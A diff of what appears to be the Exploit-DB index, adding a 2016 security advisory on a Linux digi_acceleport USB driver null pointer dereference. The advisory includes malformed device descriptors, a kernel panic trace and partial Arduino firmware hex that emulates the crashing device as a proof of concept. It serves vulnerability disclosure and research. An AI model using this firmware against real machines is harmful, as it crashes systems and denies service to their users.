+11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
 11257,platforms/windows/remote/11257.rb,"AOL 9.5 Phobos.Playlist 'Import()' Buffer Overflow Exploit (Meta)",2010-01-25,Trancer,windows,remote,0
 11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0
 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash PoC",2010-01-26,b0telh0,windows,dos,0
@@ -10434,7 +10434,7 @@ id,file,description,date,author,platform,type,port
 11380,platforms/php/webapps/11380.txt,"osTicket 1.6 RC5 - Multiple Vulnerabilities",2010-02-09,"Nahuel Grisolia",php,webapps,0
 11382,platforms/php/webapps/11382.txt,"eSmile Script (index.php) SQL Injection Vulnerability",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0
 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions Multiple SQL Injection Vulnerabilities",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0
-11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (WinXP SP3)",2010-02-10,"Beenu Arora",windows,local,0
+11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 - PLS PLA Exploit (Windows XP SP3)",2010-02-10,"Beenu Arora",windows,local,0
 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0
 11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0
 11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0
@@ -23062,7 +23062,7 @@ id,file,description,date,author,platform,type,port
 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
 25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
-25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
+25912,platforms/windows/local/25912.c,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ)",2013-06-03,"Tavis Ormandy",windows,local,0
 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
@@ -29665,7 +29665,7 @@ id,file,description,date,author,platform,type,port
 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0
 32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0
 32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0
-32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/VISTA/2003/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
+32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
 32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
@@ -29783,7 +29783,7 @@ id,file,description,date,author,platform,type,port
 33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting Vulnerability",2009-05-22,"ben hawkes",asp,webapps,0
 33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String Vulnerability",2009-05-26,lofi42,hardware,remote,0
 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0
-33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0
+33012,platforms/windows/local/33012.c,"Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0
 33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0
 33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0
 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0
@@ -30083,7 +30083,7 @@ id,file,description,date,author,platform,type,port
 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0
 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0
 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0
-33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 - Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0
+33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0
 33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0
 33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0
 33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0
@@ -30095,7 +30095,7 @@ id,file,description,date,author,platform,type,port
 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
-33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
+33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0
 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
 33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
@@ -34087,7 +34087,7 @@ id,file,description,date,author,platform,type,port
 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0
 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
-37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
+37755,platforms/windows/local/37755.c,"Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
 37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
 37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0
 37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0
@@ -35375,7 +35375,7 @@ id,file,description,date,author,platform,type,port
 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0
 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
 39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
-39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
+39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
 39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
@@ -35763,4 +35763,19 @@ id,file,description,date,author,platform,type,port
 39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0
 39524,platforms/php/webapps/39524.js,"ATutor LMS install_modules.php CSRF Remote Code Execution Vulnerability",2016-03-07,mr_me,php,webapps,0
 39525,platforms/win64/local/39525.py,"Microsoft Windows - AFD.SYS Privilege Escalation (MS14-040) Win7x64",2016-03-07,"Rick Larabee",win64,local,0
+39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0
+39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0
 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
+39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions <= 4.5.0 - .pdf Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0
+39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80
+39535,platforms/linux/local/39535.sh,"exim <= 4.84-3 - Local Root Exploit",2016-03-09,"Hacker Fantastic",linux,local,0
+39536,platforms/php/webapps/39536.txt,"WordPress SiteMile Project Theme 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80
+39537,platforms/linux/dos/39537.txt,"Linux Kernel - digi_acceleport Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
+39538,platforms/linux/dos/39538.txt,"Linux Kernel - Wacom Multiple Nullpointer Dereferences",2016-03-09,"OpenSource Security",linux,dos,0
+39539,platforms/linux/dos/39539.txt,"Linux Kernel - visor (treo_attach) Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
+39540,platforms/linux/dos/39540.txt,"Linux Kernel - visor clie_5_attach 
Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
+39542,platforms/linux/dos/39542.txt,"Linux Kernel - cypress_m8 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
+39541,platforms/linux/dos/39541.txt,"Linux Kernel - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
+39543,platforms/linux/dos/39543.txt,"Linux Kernel - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
+39544,platforms/linux/dos/39544.txt,"Linux Kernel - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
+39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
diff --git a/platforms/linux/dos/39537.txt b/platforms/linux/dos/39537.txt
new file mode 100755
index 000000000..495c32b31
--- /dev/null
+++ b/platforms/linux/dos/39537.txt
@@ -0,0 +1,605 @@
+OS-S Security Advisory 2016-12
+Linux digi_acceleport Nullpointer Dereference
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: not yet assigned
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
+USB device descriptors (digi_acceleport driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of advisory: https://os-s.net/advisories/OSS-2016-11_wacom.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
+device requiring the digi_acceleport driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
+(github.com/schumilo) using the following device descriptor:
+
+[*] Device-Descriptor
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x5c5
+idProduct: 0x2
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+The digi_acceleport driver does not use the num_ports (struct usb_serial)
+value for any kind of sanity checks during the initialization process
+(digi_port_init & digi_startup). 
Due to an incomplete sanity check, the driver
+could try to dereference a null-pointer if a malformed device-descriptor is
+presented (zero-value for bNumEndpoints or no described endpoint-descriptors).
+This results in a crash of the system.
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x0
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81
+bmAttribut: 0x3
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82
+bmAttribut: 0x1
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+Proof of Concept:
+For a proof of concept, we are providing an Arduino Leonardo firmware file. This
+firmware will emulate the defective USB device.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+The firmware has been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
+only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+To this day, no security patch was provided by the vendor.
+Since our 90-day Responsible Discourse deadline is expired, we publish this
+Security Advisory. 
+
+References:
+https://bugzilla.redhat.com/show_bug.cgi?id=1283378
+
+Kernel Stacktrace:
+
+[ 39.946974] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 40.160503] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint
+descriptors, different from the interface descriptor's value: 0
+[ 40.191627] usb 1-1: New USB device found, idVendor=05c5, idProduct=0002
+[ 40.200660] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 40.210919] usb 1-1: Product: Ä?
+[ 40.216028] usb 1-1: Manufacturer: Ä?
+[ 40.220047] usb 1-1: SerialNumber: %
+[ 40.285649] usbcore: registered new interface driver digi_acceleport
+[ 40.295629] usbserial: USB Serial support registered for Digi 2 port USB
+adapter
+[ 40.302062] usbserial: USB Serial support registered for Digi 4 port USB
+adapter
+[ 40.318968] digi_acceleport 1-1:1.0: Digi 2 port USB adapter converter
+detected
+[ 40.327158] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000268
+[ 40.328013] IP: [] __init_waitqueue_head+0xa/0x20
+[ 40.328013] PGD 0
+[ 40.328013] Oops: 0002 [#1] SMP
+[ 40.328013] Modules linked in: digi_acceleport(+) ip6t_rpfilter ip6t_REJECT
+ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
+ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
+nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
+ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
+nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
+ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
+drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
+sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
+libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
+[ 40.328013] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
+3.10.0-229.14.1.el7.x86_64 #1
+[ 40.328013] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
+rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
+[ 40.328013] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
+[ 40.328013] RIP: 0010:[] []
+__init_waitqueue_head+0xa/0x20
+[ 40.328013] RSP: 0018:ffff88000bd23a30 EFLAGS: 00010282
+[ 40.328013] RAX: 0000000000000270 RBX: ffff88000af97d80 RCX: 0000000000000000
+[ 40.328013] RDX: ffffffffa03978f8 RSI: ffffffffa0396577 RDI: 0000000000000268
+[ 40.328013] RBP: ffff88000bd23a58 R08: 0000000000016440 R09: ffff88000e401800
+[ 40.328013] R10: ffffffffa039531a R11: ffff88000c3b9800 R12: 0000000000000000
+[ 40.328013] R13: 0000000000000003 R14: ffff88000af97840 R15: ffffffffa0397200
+[ 40.328013] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
+knlGS:0000000000000000
+[ 40.328013] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
+[ 40.328013] CR2: 0000000000000268 CR3: 000000000cb80000 CR4:
+00000000000006f0
+[ 40.328013] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
+0000000000000000
+[ 40.328013] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
+[ 40.328013] Stack:
+[ 40.328013] ffff88000bd23a58 ffffffffa03953bf ffff88000d685d00 ffff88000af97840
+[ 40.328013] ffff88000c525830 ffff88000bd23a80 ffffffffa0395464 ffff88000bd23a80
+[ 40.328013] ffff88000af97858 ffff88000af97858 ffff88000bd23c18 ffffffff8145fed1
+[ 40.328013] Call Trace:
+[ 40.328013] [] ? digi_port_init+0xcf/0x100 [digi_acceleport]
+[ 40.328013] [] digi_startup+0x54/0x98 [digi_acceleport]
+[ 40.328013] [] usb_serial_probe+0xdb1/0x1230
+[ 40.328013] [] ? ida_get_new_above+0x7c/0x2a0
+[ 40.328013] [] ? kmem_cache_alloc+0x1ba/0x1d0
+[ 40.328013] [] ? sysfs_addrm_finish+0x42/0xe0
+[ 40.328013] [] ? __sysfs_add_one+0x61/0x100
+[ 40.328013] [] usb_probe_interface+0x1c4/0x2f0
+[ 40.328013] [] driver_probe_device+0x87/0x390
+[ 40.328013] [] __driver_attach+0x93/0xa0
+[ 40.328013] [] ? 
__device_attach+0x40/0x40 +[ 40.328013] [] bus_for_each_dev+0x73/0xc0 +[ 40.328013] [] driver_attach+0x1e/0x20 +[ 40.328013] [] usb_serial_register_drivers+0x29b/0x580 +[ 40.328013] [] ? 0xffffffffa0399fff +[ 40.328013] [] usb_serial_module_init+0x1e/0x1000 +[digi_acceleport] +[ 40.328013] [] do_one_initcall+0xb8/0x230 +[ 40.328013] [] load_module+0x133e/0x1b40 +[ 40.328013] [] ? ddebug_proc_write+0xf0/0xf0 +[ 40.328013] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 40.328013] [] SyS_finit_module+0xa6/0xd0 +[ 40.328013] [] system_call_fastpath+0x16/0x1b +[ 40.328013] Code: 00 48 c7 c7 50 32 d6 81 e8 74 38 57 00 e9 37 ff ff ff e8 5a +1a 57 00 e9 61 ff ff ff 0f 1f 44 00 00 0f 1f 44 00 00 55 48 8d 47 08 07 00 +00 00 00 48 89 e5 48 89 47 08 48 89 47 10 5d c3 0f 1f +[ 40.328013] RIP [] __init_waitqueue_head+0xa/0x20 +[ 40.328013] RSP +[ 40.328013] CR2: 0000000000000268 +[ 40.772818] ---[ end trace b239663354a1c556 ]--- +[ 40.778676] Kernel panic - not syncing: Fatal exception +[ 40.779642] drm_kms_helper: panic occurred, switching back to text console + +Arduino Leonardo Firmware: + +:100000000C94A8000C94C5000C94C5000C94C50079 +:100010000C94C5000C94C5000C94C5000C94C5004C +:100020000C94C5000C94C5000C94C2050C942D04CE +:100030000C94C5000C94C5000C94C5000C94C5002C +:100040000C94C5000C94C5000C94C5000C94C5001C +:100050000C94C5000C94C5000C94C5000C940C02C3 +:100060000C94C5000C94C5000C94C5000C94C500FC +:100070000C94C5000C94C5000C94C5000C94C500EC +:100080000C94C5000C94C5000C94C5000C94C500DC +:100090000C94C5000C94C5000C94C5000C94C500CC +:1000A0000C94C5000C94C5000C94C50009030C0306 +:1000B000FF0203032D032D032D0310031403180364 +:1000C0001E0322032D0328030000000200080E0077 +:1000D00000030401000B000000000000000000000D +:1000E00000000000000004080201104080401020C1 +:1000F00040804080080204018040201002011080EE +:100100001020404004040404040304050202020217 +:1001100004030202020206060606060604040202A0 +:100120000204000000002300260029002C002F00FC +:1001300000000000250028002B002E0031000000E8 
+:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E0EDF3E102C005900D92A436B107D5 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9402070C940000089547 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E949F020E94C70060E06D +:1001B00083E00E942E0361E087E00E942E0361E04D +:1001C00088E00E942E030E9457067E012AE9E20E73 +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93F90168 +:1002C0009082E4E0D9011196EC93F901DC01292D2B +:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB +:1002E0001B96FC93EE931A971D96BC92AE921C97A8 +:1002F0001183008373836283558344830C521109F5 +:100300002CE0F80111922A95E9F721E0D80119961D +:100310002C931997FE01E059FF4F01900D929A948A +:10032000E1F7F8019387828761E088E00E94670324 +:100330008BE492E00E94630688E892E00E946306E4 +:1003400087EC92E00E94630686E093E00E946306D9 +:1003500082E493E00E9463068FE793E00E946306C5 +:1003600084EA93E00E9463068BEE93E00E946306AA +:1003700083E00E949D03892B09F047C05E01F3E2F0 +:10038000AF0EB11C8824839482E1982E84E194E01E +:100390000E946306BF92AF92DF92CF92FF92EF92DC +:1003A0001F928F921F930F932DB73EB722513109A1 +:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6 +:1003C000FE01FB96892D01900D928A95E1F78DE64D +:1003D00095E00E94010668E873E180E090E00E94E9 +:1003E00079028DE695E00E944C0660E087E00E946D +:1003F000670368E873E180E090E00E9479020FB63D 
+:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0 +:1004100090E00E947902ACCF1F920F920FB60F921C +:1004200011242F933F938F939F93AF93BF9380910A +:10043000650590916605A0916705B09168053091BA +:10044000640523E0230F2D3720F40196A11DB11D73 +:1004500005C026E8230F0296A11DB11D2093640557 +:100460008093650590936605A0936705B093680532 +:100470008091690590916A05A0916B05B0916C051A +:100480000196A11DB11D8093690590936A05A09303 +:100490006B05B0936C05BF91AF919F918F913F9188 +:1004A0002F910F900FBE0F901F9018953FB7F894A3 +:1004B0008091690590916A05A0916B05B0916C05DA +:1004C00026B5A89B05C02F3F19F00196A11DB11DAF +:1004D0003FBF6627782F892F9A2F620F711D811DCC +:1004E000911D42E0660F771F881F991F4A95D1F72B +:1004F0000895CF92DF92EF92FF92CF93DF936B013B +:100500007C010E945602EB01C114D104E104F10404 +:1005100079F00E9456026C1B7D0B683E7340A0F37D +:1005200081E0C81AD108E108F108C851DC4FECCFCE +:10053000DF91CF91FF90EF90DF90CF900895789466 +:1005400084B5826084BD84B5816084BD85B58260D8 +:1005500085BD85B5816085BDEEE6F0E08081816076 +:100560008083E1E8F0E01082808182608083808176 +:1005700081608083E0E8F0E0808181608083E1E950 +:10058000F0E0808182608083808181608083E0E907 +:10059000F0E0808181608083E1ECF0E08081846024 +:1005A0008083808182608083808181608083E3ECAE +:1005B000F0E0808181608083E0ECF0E08081826007 +:1005C0008083E2ECF0E0808181608083EAE7F0E004 +:1005D000808184608083808182608083808181606B +:1005E0008083808180688083089590E0FC0131974A +:1005F000EE30F10590F5EA5AFF4F0C94A90980916D +:1006000080008F7703C0809180008F7D8093800071 +:10061000089584B58F7702C084B58F7D84BD089519 +:10062000809190008F7707C0809190008F7D03C0EC +:1006300080919000877F8093900008958091C00002 +:100640008F7703C08091C0008F7D8093C000089594 +:100650008091C200877F8093C2000895CF93DF937B +:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A +:100670008491882349F190E0880F991FFC01E25C86 +:10068000FE4FA591B491805D9E4FFC01C591D49120 +:100690009FB7611108C0F8948C91209582238C93A8 